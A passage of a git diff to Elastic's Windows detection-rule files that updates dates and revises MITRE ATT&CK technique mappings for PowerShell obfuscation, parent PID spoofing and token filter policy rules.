Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" +[[rule.threat.technique.subtechnique]] +id = "T1127.002" +name = "ClickOnce" +reference = "https://attack.mitre.org/techniques/T1127/002/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.002" +name = "Control Panel" +reference = "https://attack.mitre.org/techniques/T1218/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_parent_process_pid_spoofing.toml b/rules/windows/defense_evasion_parent_process_pid_spoofing.toml index 49a6b6d135d..dde5e4ad59f 100644 --- a/rules/windows/defense_evasion_parent_process_pid_spoofing.toml +++ b/rules/windows/defense_evasion_parent_process_pid_spoofing.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -114,36 +114,18 @@ Parent Process PID Spoofing involves manipulating the parent process identifier [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] id = "T1134.004" name = "Parent PID Spoofing" reference = "https://attack.mitre.org/techniques/T1134/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1134" -name = "Access Token Manipulation" -reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.004" -name = "Parent PID Spoofing" -reference = "https://attack.mitre.org/techniques/T1134/004/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml index 7e8558da51c..bf0b6c60dc4 100644 --- a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml +++ b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/01" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -109,36 +109,46 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.002" name = "Pass the Hash" reference = "https://attack.mitre.org/techniques/T1550/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/defense_evasion_posh_assembly_load.toml b/rules/windows/defense_evasion_posh_assembly_load.toml index b21cc5070cd..4b9f5f88ab7 100644 --- a/rules/windows/defense_evasion_posh_assembly_load.toml +++ b/rules/windows/defense_evasion_posh_assembly_load.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -148,10 +148,12 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.001" name = "Dynamic-link Library Injection" @@ -162,35 +164,38 @@ id = "T1055.002" name = "Portable Executable Injection" reference = "https://attack.mitre.org/techniques/T1055/002/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" [[rule.threat.technique]] id = "T1620" name = "Reflective Code Loading" reference = "https://attack.mitre.org/techniques/T1620/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_compressed.toml b/rules/windows/defense_evasion_posh_compressed.toml index 1af9d0caffa..c012fa70ca4 100644 --- a/rules/windows/defense_evasion_posh_compressed.toml +++ b/rules/windows/defense_evasion_posh_compressed.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -149,39 +149,44 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.015" +name = "Compression" +reference = "https://attack.mitre.org/techniques/T1027/015/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_encryption.toml b/rules/windows/defense_evasion_posh_encryption.toml index c5e38dabe16..9119cddd78b 100644 --- a/rules/windows/defense_evasion_posh_encryption.toml +++ b/rules/windows/defense_evasion_posh_encryption.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/23" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -140,22 +140,39 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.013" +name = "Encrypted/Encoded File" +reference = "https://attack.mitre.org/techniques/T1027/013/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1486" +name = "Data Encrypted for Impact" +reference = "https://attack.mitre.org/techniques/T1486/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_high_entropy.toml b/rules/windows/defense_evasion_posh_high_entropy.toml index 4519eaa5024..1c33761d18a 100644 --- a/rules/windows/defense_evasion_posh_high_entropy.toml +++ b/rules/windows/defense_evasion_posh_high_entropy.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/08" integration = ["windows"] maturity = "production" -updated_date = "2026/01/08" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -142,40 +142,44 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation.toml b/rules/windows/defense_evasion_posh_obfuscation.toml index 3f18767f36a..ad0f576c648 100644 --- a/rules/windows/defense_evasion_posh_obfuscation.toml +++ b/rules/windows/defense_evasion_posh_obfuscation.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/03" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,36 +122,41 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_posh_obfuscation_backtick.toml b/rules/windows/defense_evasion_posh_obfuscation_backtick.toml index 98b2aa03bc7..593600d7510 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_backtick.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_backtick.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -167,39 +167,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml b/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml index 8f1bd286cb1..5b4f541efd4 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -151,39 +151,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml b/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml index c138be71ed7..c13cd36baa5 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -134,39 +134,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml b/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml index 4b1409da8c8..3d73602c1e0 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/15" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -161,39 +161,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml b/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml index 9f3f14ce734..b9785e0c3fd 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -147,39 +147,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml b/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml index 68743a18154..1a012eb642f 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -149,39 +149,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml b/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml index 7ee84b163a3..fd336eafceb 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -163,39 +163,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml b/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml index f876139f3e3..13a9aad74ba 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -144,39 +144,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml b/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml index c8686112bee..665b435f5a8 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -153,39 +153,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml b/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml index ef57939e469..2dbcf2f1a43 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -152,39 +152,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_string_format.toml b/rules/windows/defense_evasion_posh_obfuscation_string_format.toml index c92ccaac12b..43d8fd31d03 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_string_format.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_string_format.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/03" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -174,39 +174,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml b/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml index eea41de377c..b681c674f4d 100644 --- 